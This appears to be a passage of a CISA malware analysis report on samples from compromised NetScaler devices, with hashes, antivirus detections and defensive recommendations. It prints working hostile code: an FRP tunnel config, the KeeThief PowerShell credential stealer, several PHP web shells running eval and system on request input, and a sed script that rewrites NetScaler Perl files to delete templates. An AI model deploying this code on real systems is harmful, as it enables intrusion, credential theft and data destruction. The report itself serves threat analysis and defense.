The contents of the configuration file are\r\ndisplayed below:\r\n—Begin Configuration Data—\r\n[common]\r\nserver_addr = [IP address]\r\nserver_port = 443\r\ntls_enable = true\r\ntoken = laksddflko986wq35029735\r\n[Indy [SCCPV01] - RDP]\r\ntype = tcp\r\nuse_encryption = true\r\nlocal_ip = [IP address]\r\nlocal_port = 3389\r\nremote_port = 0\r\n—End Configuration Data—\r\nThe protocol tunneled is RDP. The client connects outbound to the FRP server at [IP address] on port 443 over TLS,\r\nauthenticating with the shared token, and the server then forwards a port of its own (remote_port = 0 leaves the choice to\r\nthe server) to port 3389 on the internal host at local_ip. Because the control connection is outbound on port 443 with TLS,\r\nit resembles ordinary HTTPS traffic from the client host.\r\n913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nTags\r\ntrojan\r\nDetails\r\nName kee.ps1\r\nSize 357631 bytes\r\nType awk or perl script, ASCII text, with very long lines\r\nMD5 3a83cad860a688e1f40683142280a67b\r\nSHA1 d8ad2de372296501c3eb3aa0e053708eb3914113\r\nSHA256 913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nSHA512 a7afad9c446e55e25ec6289595ebeba469df0ccbc1863c437acf64e63c13b497699804de5248664d5cb78c527ffb9d1415c36a182d32002019\r\nssdeep 6144:SJU/ny0KiejKvsM7fz0QVd/eHuwF1U1zDtyftQQKasiaUKGY4RpmOHYqmqEqJ7jO:sIyCVjz0QpcU9QlTsZb\r\nEntropy 6.018326\r\nAntivirus\r\nBitDefender Application.Hacktool.TJ\r\nCyren Trojan.NBMZ-8\r\nESET MSIL/PSW.KeeThief.A trojan\r\nIkarus Trojan.PowerShell.Pklotide\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n913ee2b048... Related_To 10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\nDescription\r\nThis file is a malicious PowerShell script. It is part of the open source \"KeeThief\" project. The purpose of this script is to\r\nextract the master key material from the memory of a running KeePass 2.x process, which allows the victim's password\r\ncredentials stored in the KeePass database to be recovered. At runtime the script Base64 decodes and decompresses the\r\nembedded .NET assembly \"KeeTheft.dll\" (10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334),\r\nloads it reflectively with [Reflection.Assembly]::Load, and invokes KeeTheft.Program.GetKeePassMasterKeys against each\r\nKeePass process. 
A portion of the PowerShell script is\r\ndisplayed below (the embedded assembly string is truncated in this listing):\r\n—Begin Malicious Powershell Code—\r\n#requires -version 2\r\nfunction Get-KP\r\n{\r\n    [CmdletBinding()]\r\n    param (\r\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\r\n        [System.Diagnostics.Process[]]\r\n        [ValidateNotNullOrEmpty()]\r\n        $Process\r\n    )\r\n    BEGIN\r\n    {\r\n        if(-not $PSBoundParameters['Process'])\r\n        {\r\n            try\r\n            {\r\n                $Process = Get-Process KeePass -ErrorAction Stop | Where-Object { $_.FileVersion -match '^2\\.' }\r\n            }\r\n            catch\r\n            {\r\n                throw 'NO instances open!'\r\n            }\r\n        }\r\n        $EncodedCompressedFile = 'tL0HfFzFET/+7'\r\n        $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile), [IO.Compression.CompressionMode]::Decompress)\r\n        $UncompressedFileBytes = New-Object Byte[](738304)\r\n        $DeflatedStream.Read($UncompressedFileBytes, 0, 738304) | Out-Null\r\n        $Assembly = [Reflection.Assembly]::Load($UncompressedFileBytes)\r\n    }\r\n    PROCESS\r\n    {\r\n        ForEach($KeePassProcess in $Process)\r\n        {\r\n            if($KeePassProcess.FileVersion -match '^2\\.')\r\n            {\r\n                $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"\r\n                $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\r\n                Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\"\r\n                $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\r\n                if($Keys)\r\n                {\r\n                    ForEach($Key in $Keys)\r\n                    {\r\n                        ForEach($UserKey in $Key.UserKeys)\r\n                        {\r\n                            $KeyType = $UserKey.GetType().Name\r\n                            $UserKeyObject = New-Object PSObject\r\n                            $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\r\n                            $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\r\n                            $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\r\n                            $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\r\n                            $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\r\n                            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\r\n                            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\r\n                            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\r\n                            $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\r\n                            if($KeyType -eq 'KcpPassword')\r\n                            {\r\n                                $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\r\n                            }\r\n                            else\r\n                            {\r\n                                $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\r\n                            }\r\n                            $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\r\n                            if($KeyType -eq 'KcpUserAccount')\r\n                            {\r\n                                try\r\n                                {\r\n                                    $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"\r\n                                    $UserName = $WMIProcess.GetOwner().User\r\n                                    $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\r\n                                    $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\r\n                                }\r\n                                catch\r\n                                {\r\n                                    Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\"\r\n                                }\r\n                            }\r\n                            else\r\n                            {\r\n                                $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\r\n                            }\r\n                            $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\r\n                            $UserKeyObject\r\n                        }\r\n                    }\r\n                }\r\n                else\r\n                {\r\n                    Write-Verbose \"No keys found for $($KeePassProcess.ID)\"\r\n                }\r\n            }\r\n            else\r\n            {\r\n                Write-Warning \"Only KeePass 2.X is supported at this time.\"\r\n            }\r\n        }\r\n    }\r\n}\r\n—End Malicious Powershell Code—\r\n10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\nTags\r\ntrojan\r\nDetails\r\nName KeeTheft.dll\r\nSize 738304 bytes\r\nType PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 dc8a91125f273090cd8d76e9e588a074\r\nSHA1 3455ecca61a280a1056adb69077e0c652daa3516\r\nSHA256 10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\nSHA512 dc25e2ff93871edeb751e99cafe0717163817bfa85bd41c941c1c8b1b5ad2c63b9935060475b65dda69edce358f2759160ce94ad663c041bd\r\nssdeep 12288:NxOU+wucIYOW1ENXKUEHI7apPYEMMIjS3K9TodHNSIIcOECQ:NETcIYOWCNXKUEHI7apPYEMJ9TgHDpC\r\nEntropy 6.023616\r\nAntivirus\r\nAhnlab Trojan/Win32.Tiggre\r\nAvira TR/PSW.KeeThief.vmqvn\r\nBitDefender Gen:Variant.Ursu.299323\r\nESET a variant of MSIL/PSW.KeeThief.A trojan\r\nEmsisoft Gen:Variant.Ursu.299323 (B)\r\nIkarus Trojan.MSIL.PSW\r\nK7 Password-Stealer ( 005253fd1 )\r\nMcAfee GenericRXIL-CE!DC8A91125F27\r\nMicrosoft Security Essentials PWS:MSIL/KeeThief\r\nSymantec Trojan.Gen.MBT\r\nYARA 
Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2016-07-11 14:54:24-04:00\r\nImport Hash f34d5f2d4577ed6d9ceec516c1f5a744\r\nFile Description KeeTheft\r\nInternal Name KeeTheft.exe\r\nLegal Copyright Copyright © 2016\r\nOriginal Filename KeeTheft.exe\r\nProduct Name KeeTheft\r\nProduct Version 1.0.0.0\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ncb77191ad61291924938362fbb902f32 header 512 2.783814\r\n1fb4a5b09d9141362ed994c8a99b3cf5 .text 735744 6.030226\r\n2801de31bb6a6306f169ef81e5589521 .rsrc 1536 4.076679\r\necf88595c12869be20d521f1934da506 .reloc 512 0.101910\r\nRelationships\r\n10836bda2d... Related_To 913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nDescription\r\nThis file is a Windows executable written in the .NET programming language. This binary has been identified as the KeeTheft application, which is part of the \"KeeThief\" open source project. The primary purpose of this executable is to assist in stealing password credentials from the \"KeePass Password Safe\" password management utility. Using this malware, an operator will be able to decrypt and extract passwords from a \"KeePass\" safe, allowing access to sensitive user data and possibly the ability to pivot to the victim's user accounts outside of the victim's network.\r\nScreenshots\r\nFigure 1 - Screenshot of a list of some of the source .NET files used to build this app. 
It matches the name of some of the source files contained within the \"KeeThief\" open source project.\r\nFigure 2 - Screenshot of a list of source files within the \"KeeThief\" open source project.\r\nFigure 3 - Screenshot of .NET code decompiled from the \"KcpPassword\" file contained within this binary.\r\nFigure 4 - Screenshot of .NET code found on the \"KeeThief\" project's GitHub page, which matches the code extracted from this malicious file.\r\n51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21\r\nTags\nwebshell\nDetails\nName df5bd34799e200951fcce77c1c0b42af.php\nSize 585 bytes\nType PHP script, ASCII text\nMD5 b3b1dea400464ab5dd55e44766357957\nSHA1 507a04d3faed99cee089da042913d63f1813fc2a\nSHA256 51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21\nSHA512 f7c21a4171942edd7e0d4ab7c0b3a3a1666a3dbbed14da6af4ae3c41c7607301c0c3bc83782e22c47fe40b5297a9c1374d645d04ce3b22ceb\nssdeep 12:yDsNaficuJwHCaBzVBbgKOBUbC3c2vaveaXivglQEyKzbShL:4sCicuJwiaRVVeubCs+ieaXiY1HShL\nEntropy 5.136531\nAntivirus\nNo matches found.\nYARA Rules\nNo matches found.\nssdeep Matches\nNo matches found.\nDescription\nThis file is a component of a malicious web shell. It contains two PHP code blocks. The first block extracts information from a dictionary data structure named \"$_FILES\". Analysis indicates the script extracts provided file data, such as the file name, file type, file size, and the file's temporary location. The block then calls a function named “move_uploaded_file”. This PHP block is presumably utilized by a web shell framework to allow a remote operator to move uploaded files to a new location on the compromised system. The code contained in the function “move_uploaded_file” was not available for analysis.\nThe second PHP script block parses the variable $_GET for the value associated with the “cmd” key. 
This value is then executed on the target system using the “system()” function. This PHP block is utilized by a web shell framework to allow a remote operator to remotely execute commands on a compromised system. Displayed below is the (partial) code contained within this file:\n—Begin PHP Script—\nif ($_FILES[\"file\"][\"error\"] \u003e 0)\n{\necho \"Error: \" . $_FILES[\"file\"][\"error\"] . \"  \n\";\n}\nelse\n{\necho \"FILENAME: \" . $_FILES[\"file\"][\"name\"] . \"  \n\";\necho \"FILETYPE: \" . $_FILES[\"file\"][\"type\"] . \"  \n\";\necho \"FILETYPE: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB  \n\";\necho \"FILETEMPPATH: \" . $_FILES[\"file\"][\"tmp_name\"] . \"  \n\";\nmove_uploaded_file($_FILES[\"file\"][\"tmp_name\"], $_FILES[\"file\"][\"name\"]);\n}\n?\u003e\n\u003c?php\nif (strlen($_GET[\"cmd\"]) \u003e 0)\n{\r\n    system($_GET[\"cmd\"]);\r\n}\r\n—End PHP Script—\r\n547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c\r\nTags\r\nbackdoor\r\ntrojan\r\nwebshell\r\nDetails\r\nName df5bd34799e200951fcce77c1c0b42af_y.php\r\nSize 28 bytes\r\nType PHP script, ASCII text\r\nMD5 e11f9350ced37173d1e957ffe7d659b9\r\nSHA1 ec6d63fd5695c470bc3daea500b270eca85e81f4\r\nSHA256 547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c\r\nSHA512 ecd2ae19d5b3264821a1d88a265973b32724d2fc85b4225a23d4bc0c1aad6e8280a78de1f9024a19461a1c1b9209222eb51cb57f980c11a86\r\nssdeep 3:3/a4nL:ycL\r\nEntropy 4.521641\r\nAntivirus\r\nESET PHP/WebShell.NGI trojan\r\nMicrosoft Security Essentials Backdoor:PHP/Dirtelti.MTG\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a part of a larger malicious web shell framework. It is designed to extract data contained within a Request object, Base64 decode the data associated with a redacted parameter, and then execute this data on the compromised system. 
The data is executed using the \"eval()\" function, indicating it is expected to be a malicious JavaScript payload. The (partial) JavaScript contained within this file is displayed below:\r\n—Begin Extracted JavaScript—\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%try\r\n{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"[Redacted]\"])),\"unsafe\"); } catch(e) {}%\u003e\r\n—End Extracted JavaScript—\r\nb443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249\r\nTags\r\nbackdoor\r\nDetails\r\nName df5bd34799e200951fcce77c1c0b42af_z.php\r\nSize 30 bytes\r\nType PHP script, ASCII text\r\nMD5 8f9567ca566ab5f79081d5d17c79ee41\r\nSHA1 01c3da91407c43d9edee751bbd2e30e081165fdc\r\nSHA256 b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249\r\nSHA512 45ba8f2dac9cf0982937feb42dd6a782e84a76fae84d8168d170e52908bc40033a7fab58395c4247093af3b3cb38532563aac00a153641420b\r\nssdeep 3:3/MJHo6:0JI6\r\nEntropy 4.640224\r\nAntivirus\r\nMicrosoft Security Essentials Backdoor:PHP/Dirtelti.MTG\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a malicious PHP script. The PHP block contained within this script retrieves data from the “k0” key contained within the local \"$_POST\" variable. This data is then immediately executed on the compromised system utilizing the “system()” function. This tiny script is utilized to allow an operator to remotely execute commands on a compromised system. 
The (partial) code contained within the script is displayed below:\r\n—Begin PHP Script—\r\n\u003c?php system($_POST[\"k0\"]);\r\n—End PHP Script—\r\n2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849\r\nTags\r\nwebshell\r\nDetails\r\nName prev_sh\r\nSize 872 bytes\r\nType Rich Text Format data, version 1, ANSI\r\nMD5 ac07005f06ac63e5b1b0c1cd15a7a060\r\nSHA1 74fe38fb9b63e3d1ff112567d770aef118a31195\r\nSHA256 2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849\r\nSHA512 f2560ae09815a3011086ec1ecbdfb0102d1063dcb64a81cfb4f0d18307f0851c6f4738103024e172adb71f14982c5edcc88592f9e03f04605f8\r\nssdeep 24:EnAWZJMOvOIBCotIYZa/UKt0K7uxuOv69p:EnAWZOkOm7tIYZa/UbjUkep\r\nEntropy 5.386700\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains bash shell scripting code. The shell script is displayed below:\r\n—Begin Shell Script—\r\ncd /netscaler/portal/scripts;\r\nfor f in tips.pl themes.pl navthemes.pl rmbm.pl picktheme.pl newbm.pl savecolorprefs.pl subscription.pl PersonalBookmark.pl;\r\ndo if [ -f $f ] \u0026\u0026 ! 
grep \"/\\\\\\\\/\\\\\\\\\\.\\\\\\\\\\.\\\\\\\\// .*df5bd34799e200951fcce77c1c0b42af\" $f;\r\nthen sed -i .bk 's:use vars.*:use vars qw (%c);\r\nif($ENV{REQUEST_URI} =~ /\\\\/\\\\.\\\\.\\\\// \\\u0026\\\u0026 $ENV{REQUEST_URI} !~ /df5bd34799e200951fcce77c1c0b42af/)\r\n{my $d=\"/netscaler/portal/templates\";\r\nopendir(D,$d);\r\nwhile(my $f=readdir(D))\r\n{if($f =~ /.xml/i)\r\n{unlink(\"$d/$f\");}}\r\nclosedir(D);\r\nexit 0;}:'\r\n$f;\r\nfi;\r\ndone;\r\nrm -f *.b”\r\n—End Shell Script—\r\nAnalysis indicates this shell script attempts to read the following system scripts contained on a victim's NetScaler device and modify them if specific content is not present within the scripts:\r\n—Begin Modified Perl Scripts—\r\ntips.pl\r\nthemes.pl\r\nnavthemes.pl\r\nrmbm.pl\r\npicktheme.pl\r\nnewbm.pl\r\nsavecolorprefs.pl\r\nsubscription.pl\r\nPersonalBookmark.pl\r\n—End Modified Perl Scripts—\r\nThe NetScaler system Perl scripts modified by this application were not available for analysis.\r\nThe malware tests each Perl script using an IF statement, which contains a regex rule ensuring the Perl script does not contain the string \"df5bd34799e200951fcce77c1c0b42af\". 
If the string is not present in the script, the malware will execute the following SED command, which appears to add executable code to the system Perl scripts:\r\n—Begin SED Command—\r\nsed -i .bk 's:use vars.*:use vars qw (%c);\r\nif($ENV{REQUEST_URI} =~ /\\\\/\\\\.\\\\.\\\\// \\\u0026\\\u0026 $ENV{REQUEST_URI} !~ /df5bd34799e200951fcce77c1c0b42af/)\r\n{my $d=\"/netscaler/portal/templates\";\r\nopendir(D,$d);\r\nwhile(my $f=readdir(D))\r\n{if($f =~ /.xml/i)\r\n{unlink(\"$d/$f\");}}\r\nclosedir(D);\r\nexit 0;}:'\r\n—End SED Command—\r\nAnalysis of the code above indicates it will clear out all files in the \"/netscaler/portal/templates\" directory matching the regex rule “/.xml/i” if the system's \"$ENV{REQUEST_URI}\" variable does not contain the string \"df5bd34799e200951fcce77c1c0b42af\". This code modification appears to be utilized as part of a technique to ensure the system's \"$ENV{REQUEST_URI}\" variable continues to point to a web application whose file name contains the string \"df5bd34799e200951fcce77c1c0b42af\".\r\nThis report contains the following web shell applications that contain the string \"df5bd34799e200951fcce77c1c0b42af\" in the file's name:\r\n--Begin Files--\r\ndf5bd34799e200951fcce77c1c0b42af.php    (51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21)\r\ndf5bd34799e200951fcce77c1c0b42af_y.php (547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c)\r\ndf5bd34799e200951fcce77c1c0b42af_z.php (b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249)\r\n--End Files--\r\nThese web shell applications provide an operator remote C2 access over a victim's system.\r\nb36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a\r\nTags\r\nbackdoor\r\ntrojan\r\nwebshell\r\nDetails\r\nName tiny_webshell\r\nSize 402 bytes\r\nType Rich Text Format data, version 1, ANSI\r\nMD5 82e6e545c9863ed9f0df1e78d2457d13\r\nSHA1 
fdc411014e747715a2d6de93723865ac5134b600\r\nSHA256 b36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a\r\nSHA512 cbe7374679872f635564b6da357b806ffd11f86881ea9fe9286682a73e49b152b88b01c9f6c872fb3ac04044b5d2955c92b03793877e6ecbc\r\nssdeep 6:L4vrWK+dSQSm+BhYrJDeSykilDo5WZuXP7SX8R6H4cYzat7qq4+u13HfEW2A6xQ0:HKUSmsY+1AWZuDSXA6/YXF3M/Qq3\r\nEntropy 5.136055\r\nAntivirus\r\nESET PHP/WebShell.NBV trojan\r\nMicrosoft Security Essentials Backdoor:PHP/Chopper.C!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains a small PHP script block that is designed to receive a web POST, extract and Base64 decode its contents, and then execute this data on the compromised system. The code contained within this file is displayed below:\r\n—Begin File Data—\r\n\u003c?php @eval(base64_decode($_POST['citrix@[Redacted]']));?\u003e\r\n—End File Data—\r\nAs illustrated within this data, the POST parameter utilized to deliver data to the script block is expected to be \"citrix@[Redacted]\". 
It is believed this script is related to the Tiny web shell.\r\n8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3\r\nTags\r\nremote-access-trojan\r\nwebshell\r\nDetails\r\nName content\r\nSize 5599 bytes\r\nType PHP script, ASCII text\r\nMD5 ce868f9ed3ebd9036456da37749ab7b9\r\nSHA1 6099d6e21fd81c2fb85e9b157f64d2cad8fec310\r\nSHA256 8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3\r\nSHA512 e69966437bb4c3a819a425c6d8197fe8b7a01d2396eaa9d8f88312834e85eba8bb53f36aceefe306cbc3affe6e843afc2a833d89f02a5e7392d\r\nssdeep 96:NqNB3EXRKYIkbu0J5vmkI0K1sZMHXN+XNyBa9M6XN2XN7Emf+qsTMUoPk4xe0tM9:O3EhFIcT+sKSZMdMyBCMQk7d5I\r\nEntropy 5.298102\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a modified copy of the open source web shell known as Chunky Tuna and provides a remote operator with C2 capabilities over a compromised system. Displayed below is some of the code extracted from this script:\r\n—Begin Extracted Code—\r\n$headers = getallheaders();\r\n// if the header doesn't match the key\r\nif (array_key_exists('X-Pwd', $headers) \u0026\u0026 $headers['X-Pwd'] !== \"Ddzq1Mg6rIJDCAj7ch78vl3ZEGcXnqKjs97gs5y\") {\r\n_log(\"wrong pwd: \");\r\ndie();\r\n}\r\n// NOP, for setting cookies\r\nif (array_key_exists('X-Nop', $headers) \u0026\u0026 $headers[\"X-Nop\"] === \"1\") {\r\n_log(\"[X-Nop] Request\".print_r($headers,true));\r\nreturn;\r\n}\r\n// determine operation type\r\nif (array_key_exists('X-Type', $headers)) {\r\n$opType = $headers[\"X-Type\"];\r\n} else {\r\n$opType = \"\";\r\n}\r\n—————————\r\nwhile ($continue) {\r\n        $read = array($pipes[1], $pipes[2]);\r\n        // $write = array($pipes[0]);\r\n        $write = NULL;\r\n        $except = NULL;\r\n        @session_start();\r\n        if ($_SESSION[\"data\"] != \"\") {\r\n            _log(\"Got data!\");\r\n            // write 
it\r\n            fwrite($pipes[0], $_SESSION[\"data\"]);\r\n            // wipe it\r\n            $_SESSION[\"data\"] = \"\";\r\n            $activity_time = microtime(true);\r\n        }\r\n        session_write_close();\r\n        $ss = stream_select($read, $write, $except, $tv_sec = 0, $tv_usec =50000);\r\n        // bleh. not the best inactivity timeout...\r\n        $now = microtime(true);\r\n        if ($now - $activity_time \u003e 30) {\r\n            $continue = false;\r\n            _log(\"Max inactivity time exceeded\");\r\n            break;\r\n        }\r\n        // _log(stream_get_contents($pipes[1]));\r\n        // next round\r\n        if ($ss === 0) continue;\r\n        if ($ss === false) {\r\n            _log(\"\\nServer shutting down\");\r\n            $continue = false;\r\n            break;\r\n        }\r\n        if ($ss \u003c 1) {\r\n            _log(\"\\nNothing to do\");\r\n            continue;\r\n        }\r\n—End Extracted Code—\r\nFigures 5 and 6 contain similar code from the open source Chunky Tuna web shell.\r\nScreenshots\r\nFigure 5 - Code located on the Chunky Tuna web shell project website. This sample has very similar code.\r\nFigure 6 - Code located on the Chunky Tuna web shell project website. 
This sample has very similar code.\r\n3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c\r\nTags\r\nwebshell\r\nDetails\r\nName content\r\nSize 365 bytes\r\nType PHP script, ASCII text, with CRLF line terminators\r\nMD5 750b1bf7269ffc5860166efa8af6b34e\r\nSHA1 f4d152a700d93703592dc3652ff7b52ef00b4f7e\r\nSHA256 3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c\r\nSHA512 fcae4efb50a6e72363edfd822939ff9204ca2368963ad825e5c8b5a256255e93bc8f556cd91aa4629c53a117892e03d95aad9c4716ded27300\r\nssdeep 6:99YpbSYDFYE9LO3b6bLAztLUJD/9RH80Ab6bLAztLUJOdLGX80Ab6bLAztLUJI5t:96RSurpOryLAztQ7H0WLAztzGX0WLAz/\r\nEntropy 5.142417\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains a single PHP script block. The script is designed to listen for incoming HTTP GET connections. The script will extract data from the ‘u’ parameter, and place it into a variable named \"$username\". The script will also extract data from the ‘p’ parameter, and place it into a variable named \"$password\". This data is then placed into the function \"file_put_contents\", along with the static string \"netscaler.1\". It appears this malicious web shell is designed to allow a remote operator to remotely add accounts to a compromised NetScaler device. 
This file contains the following (partial) PHP script code:\r\n—Begin PHP Code—\r\n\u003c?php\r\n$username= $_GET['u'];\r\n$password= $_GET['p'];\r\nif ($username !=\"undefined\"){\r\nfile_put_contents(\"netscaler.1\" , \"Username:\".$username.PHP_EOL ,FILE_APPEND);\r\nfile_put_contents(\"netscaler.1\" , \"Password:\".$password.PHP_EOL ,FILE_APPEND);\r\nfile_put_contents(\"netscaler.1\" , \"-----------------------------------------------------\".PHP_EOL ,FILE_APPEND);\r\n}\r\n—End PHP Code—\r\n4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756\r\nTags\r\nbackdoor\r\ntrojan\r\nwebshell\r\nDetails\r\nName content\r\nSize 57 bytes\r\nType PHP script, ASCII text, with no line terminators\r\nMD5 fd6c1e1fbe93a6c1ae97da3ddc3a381f\r\nSHA1 a5225159267538863f8625050de94d880d54d2d4\r\nSHA256 4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756\r\nSHA512 ea392b3dd9c323ae5e41d68394a56bb13914e9311f2d98648c9b5560af3bb9f85b4ac4d5a947bce5658fa230b3902fb574e5247c626643150\r\nssdeep 3:E1uWATR7cNT2xrXMnFNXC4/:EEW2A6xQnqO\r\nEntropy 4.922815\r\nAntivirus\r\nESET PHP/WebShell.NBV trojan\r\nMicrosoft Security Essentials Backdoor:PHP/Dirtelti.MTF\r\nNANOAV Trojan.Html.Backdoor.fqkken\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains a small PHP script block and has been identified as a malicious web shell. It is designed to accept a POST request and extract the data associated with the parameter 'citrix@[Redacted]'. This data will then be decoded using a function named \"base64_decode\". The data will then be executed via the PHP \"eval\" function, indicating the application expects this data to be additional PHP code. This web shell will allow a remote operator to execute additional PHP payloads on a compromised system. 
This file contains the following (partial) PHP code:\r\n—Begin PHP—\r\n\u003c?php @eval(base64_decode($_POST['citrix@[Redacted]']));\r\n—End PHP—\r\nRelationship Summary\r\n99344d862e... Related_To 28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\n28bc161df8... Related_To 99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\n913ee2b048... Related_To 10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\n10836bda2d... Related_To 913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. 
Do not add users to the local administrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and Laptops\".\r\nContact Information\r\n1-844-Say-CISA\r\nCISA Central  (UNCLASS)\r\nCISA SIPR  (SIPRNET)\r\nCISA IC  (JWICS)\r\nCISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. 
